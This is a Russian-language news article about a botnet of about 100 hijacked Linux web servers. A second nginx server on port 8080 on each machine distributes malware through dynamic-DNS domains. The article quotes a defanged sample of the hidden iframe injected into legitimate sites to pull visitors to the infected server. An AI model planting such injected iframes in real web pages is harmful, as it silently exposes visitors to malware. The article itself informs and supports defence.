Как сообщает ресурс The Register, специалист по вопросам компьютерной безопасности обнаружил кластер инфицированных серверов под управлением операционных систем Linux, объединенных в ботнет, который распространяет вредоносное ПО. Отметим, ранее были зафиксированы ботнеты для платформы Mac, мобильных телефонов и роутеров.
Каждый инфицированный компьютер является выделенным или виртуальным сервером, обслуживающим обычные легитимные сайты. Но в дополнение к основной задаче (веб-сервер Apache) они также были взломаны злоумышленниками и настроены на обслуживание второго веб-сервера nginx, который и распространяет вредоносное ПО. Сервера обслуживают легитимный трафик через порт 80 — стандартный порт TCP, используемый сайтами. Для нужд злоумышленников используется порт 8080, через который передается информация о DNS свободных доменных имен, которые привязываются к IP адресу зараженного компьютера. Далее в обычные сайты скрыто внедряется участок кода, например, нечто вроде <i_frame src="http ://a86x . homeunix . org:8080 /ts/in.cgi? open2" width=997 height=0 style="visibility: hidden"></iframe> (код изменен с целью обеспечения безопасности), который без ведома посетителя сайта обращается к зараженному серверу и способствует распространению вредоносного ПО.
По словам Дениса Синегубко, независимого ИТ-специалиста обнаружившего ботнет, имеется в наличии большая группа связанных зараженных веб-серверов (зомби), которые управляются общим контрольным центром. Кроме того, данный ботнет связан с другим ботнетом, который включает в себя зараженные домашние компьютеры.
На данный момент пока точно неизвестно, как произошло первичное заражение веб-серверов. Делается предположение, что все они обслуживались невнимательными администраторами, которые каким-то образом дали доступ злоумышленникам к своим root паролям. Для внедрения кода iframe в веб-страницы злоумышленники также должны были получить доступ к FTP паролям пользователей.
В настоящее время зафиксировано около 100 зараженных серверов, которые управляются различными версиями Linux и обслуживают веб-сервер Apache. Такой незначительный по масштабам ботнет пока не дает возможности точно определить намерения злоумышленников. В связи с этим существует два предположения:
После обращения Дениса Синегубко к провайдерам DynDNS.com и No-IP.com, которые используются злоумышленниками для подбора свободных доменных имен, они оперативно отреагировали на предупреждение и закрыли указанные домены. Но Синегубко продолжает фиксировать по два новых IP адреса, используемых хакерами, ежечасно, таким образом, следует ожидать дальнейшего расширения ботнета, что подтверждает справедливость второй гипотезы.